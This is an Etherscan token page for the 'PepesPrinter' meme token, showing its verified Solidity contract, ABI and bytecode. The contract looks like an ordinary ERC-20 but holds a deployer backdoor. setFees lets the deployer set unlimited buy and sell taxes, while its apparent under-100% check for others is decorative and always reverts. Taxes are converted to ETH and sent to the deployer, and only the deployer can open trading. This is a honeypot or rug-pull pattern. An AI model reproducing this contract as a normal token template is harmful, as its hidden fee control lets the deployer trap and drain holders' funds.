ETH Price: $2,795.73 (+2.00%)

Token

PepesPrinter (PepesPrinter)
 

Overview

Max Total Supply

21,000 PepesPrinter

Holders

31

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
507.401301535 PepesPrinter

Value
$0.00
0xc7b4e6743782c6d5b2992cea03945f66cdcfbe14
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PepesPrinter

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-04-21
*/

// BabyPepe

// Telegram: https://t.me/pepesprinterETH

// Introducing Pepes Printer goes BRRRRR!

// SPDX-License-Identifier: MIT

pragma solidity =0.8.18;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

}
interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
contract PepesPrinter {
    mapping (address => uint256) public balanceOf;
    mapping (address => mapping (address => uint256)) public allowance;

    string public constant name = "PepesPrinter";   
    string public constant symbol = "PepesPrinter";   
    uint8 public constant decimals = 9;
    uint256 public constant totalSupply = 21000000000000;

    uint256 buyTax = 0;
    uint256 sellTax = 0;
    uint256 constant swapAmount = totalSupply / 1000;
    uint256 constant maxWallet = 21000000000000;

    bool tradingOpened = false;
    bool swapping;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    address immutable pair;
    address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
    address payable constant deployer = payable(address(0x03A5DbDE406c7D1fD90866866D5C10E285A7e457));

    constructor() {
        pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), ETH);
        balanceOf[msg.sender] = totalSupply;
        allowance[address(this)][routerAddress] = type(uint256).max;
        emit Transfer(address(0), msg.sender, totalSupply);
    }

    receive() external payable {}

    function approve(address spender, uint256 amount) external returns (bool){
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool){
        return _transfer(msg.sender, to, amount);
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool){
        allowance[from][msg.sender] -= amount;        
        return _transfer(from, to, amount);
    }

    function _transfer(address from, address to, uint256 amount) internal returns (bool){
        balanceOf[from] -= amount;

        if(from != deployer)
            require(tradingOpened);

        if(to != pair && to != deployer)
            require(balanceOf[to] + amount <= maxWallet);

        if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
            swapping = true;
            address[] memory path = new  address[](2);
            path[0] = address(this);
            path[1] = ETH;
            _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                swapAmount,
                0,
                path,
                address(this),
                block.timestamp
            );
            deployer.transfer(address(this).balance);
            swapping = false;
        }

        if(from != address(this) && to != deployer){
            uint256 taxAmount = amount * (from == pair ? buyTax : sellTax) / 100;
            amount -= taxAmount;
            balanceOf[address(this)] += taxAmount;
            emit Transfer(from, address(this), taxAmount);
        }
        balanceOf[to] += amount;
        emit Transfer(from, to, amount);
        return true;
    }

    function enableTrading() external {
        require(msg.sender == deployer);
        tradingOpened = true;
    }

    function setFees(uint256 newBuyTax, uint256 newSellTax) external {
        if(msg.sender == deployer){
            buyTax = newBuyTax;
            sellTax = newSellTax;
        }
        else{
            require(newBuyTax < 100);
            require(newSellTax < 100);
            revert();
        }
       }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newBuyTax","type":"uint256"},{"internalType":"uint256","name":"newSellTax","type":"uint256"}],"name":"setFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a0604052600060028190556003556004805460ff1916905534801561002457600080fd5b50737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610077573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061009b91906101a8565b6040516364e329cb60e11b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc260248201526001600160a01b03919091169063c9c65396906044016020604051808303816000875af11580156100fd573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061012191906101a8565b6001600160a01b031660805233600081815260208181526040808320651319718a50009081905530845260018352818420737a250d5630b4cf539739df2c5dacb4c659f2488d85528352818420600019905590519081527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36101d8565b6000602082840312156101ba57600080fd5b81516001600160a01b03811681146101d157600080fd5b9392505050565b608051610a88610201600039600081816103f80152818161049301526106c20152610a886000f3fe6080604052600436106100a05760003560e01c8063313ce56711610064578063313ce5671461019457806370a08231146101bb5780638a8c523c146101e857806395d89b41146100ac578063a9059cbb146101fd578063dd62ed3e1461021d57600080fd5b806306fdde03146100ac578063095ea7b3146100fa5780630b78f9c01461012a57806318160ddd1461014c57806323b872dd1461017457600080fd5b366100a757005b600080fd5b3480156100b857600080fd5b506100e46040518060400160405280600c81526020016b2832b832b9a83934b73a32b960a11b81525081565b6040516100f19190610816565b60405180910390f35b34801561010657600080fd5b5061011a610115366004610880565b610255565b60405190151581526020016100f1565b34801561013657600080fd5b5061014a6101453660046108aa565b6102c2565b005b34801561015857600080fd5b50610166651319718a500081565b6040519081526020016100f1565b34801561018057600080fd5b5061011a61018f3660046108cc565b610303565b3480156101a057600080fd5b506101a9600981565b60405160ff90911681526020016100f1565b3480156101c757600080fd5b506101666101d6366004610908565b60006020819052908152604090205481565b3480156101f457600080fd5b5061014a610351565b34801561020957600080fd5b5061011a610218366004610880565b610380565b34801561022957600080fd5b50610166610238366004610923565b600160209081526000928352604080842090915290825290205481565b3360008181526001602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102b09086815260200190565b60405180910390a35060015b92915050565b7303a5dbde406c7d1fd90866866d5c10e285a7e4561933016102e957600291909155600355565b606482106102f657600080fd5b606481106100a757600080fd5b6001600160a01b038316600090815260016020908152604080832033845290915281208054839190839061033890849061096c565b909155506103499050848484610394565b949350505050565b337303a5dbde406c7d1fd90866866d5c10e285a7e4571461037157600080fd5b6004805460ff19166001179055565b600061038d338484610394565b9392505050565b6001600160a01b0383166000908152602081905260408120805483919083906103be90849061096c565b90915550506001600160a01b0384167303a5dbde406c7d1fd90866866d5c10e285a7e457146103f65760045460ff166103f657600080fd5b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b03161415801561045557506001600160a01b0383167303a5dbde406c7d1fd90866866d5c10e285a7e45714155b15610491576001600160a01b038316600090815260208190526040902054651319718a50009061048690849061097f565b111561049157600080fd5b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b03161480156104da5750600454610100900460ff16155b801561050657506104f36103e8651319718a5000610992565b3060009081526020819052604090205410155b15610681576004805461ff001916610100179055604080516002808252606082018352600092602083019080368337019050509050308160008151811061054f5761054f6109b4565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc281600181518110610597576105976109b4565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac9476105db6103e8651319718a5000610992565b60008430426040518663ffffffff1660e01b81526004016106009594939291906109ca565b600060405180830381600087803b15801561061a57600080fd5b505af115801561062e573d6000803e3d6000fd5b50506040517303a5dbde406c7d1fd90866866d5c10e285a7e45792504780156108fc029250906000818181858888f19350505050158015610673573d6000803e3d6000fd5b50506004805461ff00191690555b6001600160a01b03841630148015906106b757506001600160a01b0383167303a5dbde406c7d1fd90866866d5c10e285a7e45714155b1561079057600060647f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316866001600160a01b03161461070157600354610705565b6002545b61070f9085610a3b565b6107199190610992565b9050610725818461096c565b3060009081526020819052604081208054929550839290919061074990849061097f565b909155505060405181815230906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b6001600160a01b038316600090815260208190526040812080548492906107b890849061097f565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161080491815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561084357858101830151858201604001528201610827565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461087b57600080fd5b919050565b6000806040838503121561089357600080fd5b61089c83610864565b946020939093013593505050565b600080604083850312156108bd57600080fd5b50508035926020909101359150565b6000806000606084860312156108e157600080fd5b6108ea84610864565b92506108f860208501610864565b9150604084013590509250925092565b60006020828403121561091a57600080fd5b61038d82610864565b6000806040838503121561093657600080fd5b61093f83610864565b915061094d60208401610864565b90509250929050565b634e487b7160e01b600052601160045260246000fd5b818103818111156102bc576102bc610956565b808201808211156102bc576102bc610956565b6000826109af57634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610a1a5784516001600160a01b0316835293830193918301916001016109f5565b50506001600160a01b03969096166060850152505050608001529392505050565b80820281158282048414176102bc576102bc61095656fea264697066735822122002598eab08dbd780cd93969cacf9a53bdfe54fdddbab54d91dc3a21e287ee85464736f6c63430008120033

Deployed Bytecode

0x6080604052600436106100a05760003560e01c8063313ce56711610064578063313ce5671461019457806370a08231146101bb5780638a8c523c146101e857806395d89b41146100ac578063a9059cbb146101fd578063dd62ed3e1461021d57600080fd5b806306fdde03146100ac578063095ea7b3146100fa5780630b78f9c01461012a57806318160ddd1461014c57806323b872dd1461017457600080fd5b366100a757005b600080fd5b3480156100b857600080fd5b506100e46040518060400160405280600c81526020016b2832b832b9a83934b73a32b960a11b81525081565b6040516100f19190610816565b60405180910390f35b34801561010657600080fd5b5061011a610115366004610880565b610255565b60405190151581526020016100f1565b34801561013657600080fd5b5061014a6101453660046108aa565b6102c2565b005b34801561015857600080fd5b50610166651319718a500081565b6040519081526020016100f1565b34801561018057600080fd5b5061011a61018f3660046108cc565b610303565b3480156101a057600080fd5b506101a9600981565b60405160ff90911681526020016100f1565b3480156101c757600080fd5b506101666101d6366004610908565b60006020819052908152604090205481565b3480156101f457600080fd5b5061014a610351565b34801561020957600080fd5b5061011a610218366004610880565b610380565b34801561022957600080fd5b50610166610238366004610923565b600160209081526000928352604080842090915290825290205481565b3360008181526001602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102b09086815260200190565b60405180910390a35060015b92915050565b7303a5dbde406c7d1fd90866866d5c10e285a7e4561933016102e957600291909155600355565b606482106102f657600080fd5b606481106100a757600080fd5b6001600160a01b038316600090815260016020908152604080832033845290915281208054839190839061033890849061096c565b909155506103499050848484610394565b949350505050565b337303a5dbde406c7d1fd90866866d5c10e285a7e4571461037157600080fd5b6004805460ff19166001179055565b600061038d338484610394565b9392505050565b6001600160a01b0383166000908152602081905260408120805483919083906103be90849061096c565b90915550506001600160a01b0384167303a5dbde406c7d1fd90866866d5c10e285a7e457146103f65760045460ff166103f657600080fd5b7f000000000000000000000000a6915b066e111890e54fb268d4dd5f8168ad9fe56001600160a01b0316836001600160a01b03161415801561045557506001600160a01b0383167303a5dbde406c7d1fd90866866d5c10e285a7e45714155b15610491576001600160a01b038316600090815260208190526040902054651319718a50009061048690849061097f565b111561049157600080fd5b7f000000000000000000000000a6915b066e111890e54fb268d4dd5f8168ad9fe56001600160a01b0316836001600160a01b03161480156104da5750600454610100900460ff16155b801561050657506104f36103e8651319718a5000610992565b3060009081526020819052604090205410155b15610681576004805461ff001916610100179055604080516002808252606082018352600092602083019080368337019050509050308160008151811061054f5761054f6109b4565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc281600181518110610597576105976109b4565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac9476105db6103e8651319718a5000610992565b60008430426040518663ffffffff1660e01b81526004016106009594939291906109ca565b600060405180830381600087803b15801561061a57600080fd5b505af115801561062e573d6000803e3d6000fd5b50506040517303a5dbde406c7d1fd90866866d5c10e285a7e45792504780156108fc029250906000818181858888f19350505050158015610673573d6000803e3d6000fd5b50506004805461ff00191690555b6001600160a01b03841630148015906106b757506001600160a01b0383167303a5dbde406c7d1fd90866866d5c10e285a7e45714155b1561079057600060647f000000000000000000000000a6915b066e111890e54fb268d4dd5f8168ad9fe56001600160a01b0316866001600160a01b03161461070157600354610705565b6002545b61070f9085610a3b565b6107199190610992565b9050610725818461096c565b3060009081526020819052604081208054929550839290919061074990849061097f565b909155505060405181815230906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b6001600160a01b038316600090815260208190526040812080548492906107b890849061097f565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161080491815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561084357858101830151858201604001528201610827565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461087b57600080fd5b919050565b6000806040838503121561089357600080fd5b61089c83610864565b946020939093013593505050565b600080604083850312156108bd57600080fd5b50508035926020909101359150565b6000806000606084860312156108e157600080fd5b6108ea84610864565b92506108f860208501610864565b9150604084013590509250925092565b60006020828403121561091a57600080fd5b61038d82610864565b6000806040838503121561093657600080fd5b61093f83610864565b915061094d60208401610864565b90509250929050565b634e487b7160e01b600052601160045260246000fd5b818103818111156102bc576102bc610956565b808201808211156102bc576102bc610956565b6000826109af57634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610a1a5784516001600160a01b0316835293830193918301916001016109f5565b50506001600160a01b03969096166060850152505050608001529392505050565b80820281158282048414176102bc576102bc61095656fea264697066735822122002598eab08dbd780cd93969cacf9a53bdfe54fdddbab54d91dc3a21e287ee85464736f6c63430008120033

Deployed Bytecode Sourcemap

620:3775:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;776:44;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;776:44:0;;;;;;;;;;;;:::i;:::-;;;;;;;;2126:206;;;;;;;;;;-1:-1:-1;2126:206:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;2126:206:0;1004:187:1;4072:320:0;;;;;;;;;;-1:-1:-1;4072:320:0;;;;;:::i;:::-;;:::i;:::-;;927:52;;;;;;;;;;;;965:14;927:52;;;;;1595:25:1;;;1583:2;1568:18;927:52:0;1449:177:1;2476:196:0;;;;;;;;;;-1:-1:-1;2476:196:0;;;;;:::i;:::-;;:::i;886:34::-;;;;;;;;;;;;919:1;886:34;;;;;2136:4:1;2124:17;;;2106:36;;2094:2;2079:18;886:34:0;1964:184:1;649:45:0;;;;;;;;;;-1:-1:-1;649:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;;3949:115;;;;;;;;;;;;;:::i;2340:128::-;;;;;;;;;;-1:-1:-1;2340:128:0;;;;;:::i;:::-;;:::i;701:66::-;;;;;;;;;;-1:-1:-1;701:66:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2126:206;2220:10;2194:4;2210:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2210:30:0;;;;;;;;;;:39;;;2265:37;2194:4;;2210:30;;2265:37;;;;2243:6;1595:25:1;;1583:2;1568:18;;1449:177;2265:37:0;;;;;;;;-1:-1:-1;2320:4:0;2126:206;;;;;:::o;4072:320::-;-1:-1:-1;;4151:10:0;:22;4148:234;;4189:6;:18;;;;4222:7;:20;4072:320::o;4148:234::-;4303:3;4291:9;:15;4283:24;;;;;;4343:3;4330:10;:16;4322:25;;;;;2476:196;-1:-1:-1;;;;;2574:15:0;;2558:4;2574:15;;;:9;:15;;;;;;;;2590:10;2574:27;;;;;;;:37;;2605:6;;2574:27;2558:4;;2574:37;;2605:6;;2574:37;:::i;:::-;;;;-1:-1:-1;2637:27:0;;-1:-1:-1;2647:4:0;2653:2;2657:6;2637:9;:27::i;:::-;2630:34;2476:196;-1:-1:-1;;;;2476:196:0:o;3949:115::-;4002:10;1721:42;4002:22;3994:31;;;;;;4036:13;:20;;-1:-1:-1;;4036:20:0;4052:4;4036:20;;;3949:115::o;2340:128::-;2404:4;2427:33;2437:10;2449:2;2453:6;2427:9;:33::i;:::-;2420:40;2340:128;-1:-1:-1;;;2340:128:0:o;2680:1261::-;-1:-1:-1;;;;;2775:15:0;;2759:4;2775:15;;;;;;;;;;:25;;2794:6;;2775:15;2759:4;;2775:25;;2794:6;;2775:25;:::i;:::-;;;;-1:-1:-1;;;;;;;2816:16:0;;1721:42;2816:16;2813:56;;2855:13;;;;2847:22;;;;;;2891:4;-1:-1:-1;;;;;2885:10:0;:2;-1:-1:-1;;;;;2885:10:0;;;:28;;;;-1:-1:-1;;;;;;2899:14:0;;1721:42;2899:14;;2885:28;2882:90;;;-1:-1:-1;;;;;2936:13:0;;:9;:13;;;;;;;;;;;1123:14;;2936:22;;2952:6;;2936:22;:::i;:::-;:35;;2928:44;;;;;;2995:4;-1:-1:-1;;;;;2989:10:0;:2;-1:-1:-1;;;;;2989:10:0;;:23;;;;-1:-1:-1;3004:8:0;;;;;;;3003:9;2989:23;:65;;;;-1:-1:-1;1069:18:0;1083:4;965:14;1069:18;:::i;:::-;3034:4;3016:9;:24;;;;;;;;;;;:38;;2989:65;2985:555;;;3070:8;:15;;-1:-1:-1;;3070:15:0;;;;;3124:17;;;3139:1;3124:17;;;;;;;;-1:-1:-1;;3124:17:0;;;;;;;;;;-1:-1:-1;3124:17:0;3100:41;;3174:4;3156;3161:1;3156:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;3156:23:0;;;-1:-1:-1;;;;;3156:23:0;;;;;1451:42;3194:4;3199:1;3194:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;3194:13:0;;;:7;;;;;;;;;;;:13;1533:42;3222:67;1069:18;1083:4;965:14;1069:18;:::i;:::-;3337:1;3357:4;3388;3412:15;3222:220;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3457:40:0;;1721:42;;-1:-1:-1;3475:21:0;3457:40;;;;;-1:-1:-1;3475:21:0;3457:40;;;;3475:21;1721:42;3457:40;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3512:8:0;:16;;-1:-1:-1;;3512:16:0;;;2985:555;-1:-1:-1;;;;;3555:21:0;;3571:4;3555:21;;;;:39;;-1:-1:-1;;;;;;3580:14:0;;1721:42;3580:14;;3555:39;3552:284;;;3610:17;3675:3;3648:4;-1:-1:-1;;;;;3640:12:0;:4;-1:-1:-1;;;;;3640:12:0;;:31;;3664:7;;3640:31;;;3655:6;;3640:31;3630:42;;:6;:42;:::i;:::-;:48;;;;:::i;:::-;3610:68;-1:-1:-1;3693:19:0;3610:68;3693:19;;:::i;:::-;3745:4;3727:9;:24;;;;;;;;;;:37;;3693:19;;-1:-1:-1;3755:9:0;;3727:24;;:9;:37;;3755:9;;3727:37;:::i;:::-;;;;-1:-1:-1;;3784:40:0;;1595:25:1;;;3807:4:0;;-1:-1:-1;;;;;3784:40:0;;;;;1583:2:1;1568:18;3784:40:0;;;;;;;3595:241;3552:284;-1:-1:-1;;;;;3846:13:0;;:9;:13;;;;;;;;;;:23;;3863:6;;3846:9;:23;;3863:6;;3846:23;:::i;:::-;;;;;;;;3900:2;-1:-1:-1;;;;;3885:26:0;3894:4;-1:-1:-1;;;;;3885:26:0;;3904:6;3885:26;;;;1595:25:1;;1583:2;1568:18;;1449:177;3885:26:0;;;;;;;;-1:-1:-1;3929:4:0;2680:1261;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1196:248::-;1264:6;1272;1325:2;1313:9;1304:7;1300:23;1296:32;1293:52;;;1341:1;1338;1331:12;1293:52;-1:-1:-1;;1364:23:1;;;1434:2;1419:18;;;1406:32;;-1:-1:-1;1196:248:1:o;1631:328::-;1708:6;1716;1724;1777:2;1765:9;1756:7;1752:23;1748:32;1745:52;;;1793:1;1790;1783:12;1745:52;1816:29;1835:9;1816:29;:::i;:::-;1806:39;;1864:38;1898:2;1887:9;1883:18;1864:38;:::i;:::-;1854:48;;1949:2;1938:9;1934:18;1921:32;1911:42;;1631:328;;;;;:::o;2153:186::-;2212:6;2265:2;2253:9;2244:7;2240:23;2236:32;2233:52;;;2281:1;2278;2271:12;2233:52;2304:29;2323:9;2304:29;:::i;2344:260::-;2412:6;2420;2473:2;2461:9;2452:7;2448:23;2444:32;2441:52;;;2489:1;2486;2479:12;2441:52;2512:29;2531:9;2512:29;:::i;:::-;2502:39;;2560:38;2594:2;2583:9;2579:18;2560:38;:::i;:::-;2550:48;;2344:260;;;;;:::o;2609:127::-;2670:10;2665:3;2661:20;2658:1;2651:31;2701:4;2698:1;2691:15;2725:4;2722:1;2715:15;2741:128;2808:9;;;2829:11;;;2826:37;;;2843:18;;:::i;2874:125::-;2939:9;;;2960:10;;;2957:36;;;2973:18;;:::i;3004:217::-;3044:1;3070;3060:132;;3114:10;3109:3;3105:20;3102:1;3095:31;3149:4;3146:1;3139:15;3177:4;3174:1;3167:15;3060:132;-1:-1:-1;3206:9:1;;3004:217::o;3358:127::-;3419:10;3414:3;3410:20;3407:1;3400:31;3450:4;3447:1;3440:15;3474:4;3471:1;3464:15;3490:980;3752:4;3800:3;3789:9;3785:19;3831:6;3820:9;3813:25;3857:2;3895:6;3890:2;3879:9;3875:18;3868:34;3938:3;3933:2;3922:9;3918:18;3911:31;3962:6;3997;3991:13;4028:6;4020;4013:22;4066:3;4055:9;4051:19;4044:26;;4105:2;4097:6;4093:15;4079:29;;4126:1;4136:195;4150:6;4147:1;4144:13;4136:195;;;4215:13;;-1:-1:-1;;;;;4211:39:1;4199:52;;4306:15;;;;4271:12;;;;4247:1;4165:9;4136:195;;;-1:-1:-1;;;;;;;4387:32:1;;;;4382:2;4367:18;;4360:60;-1:-1:-1;;;4451:3:1;4436:19;4429:35;4348:3;3490:980;-1:-1:-1;;;3490:980:1:o;4475:168::-;4548:9;;;4579;;4596:15;;;4590:22;;4576:37;4566:71;;4617:18;;:::i

Swarm Source

ipfs://02598eab08dbd780cd93969cacf9a53bdfe54fdddbab54d91dc3a21e287ee854
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.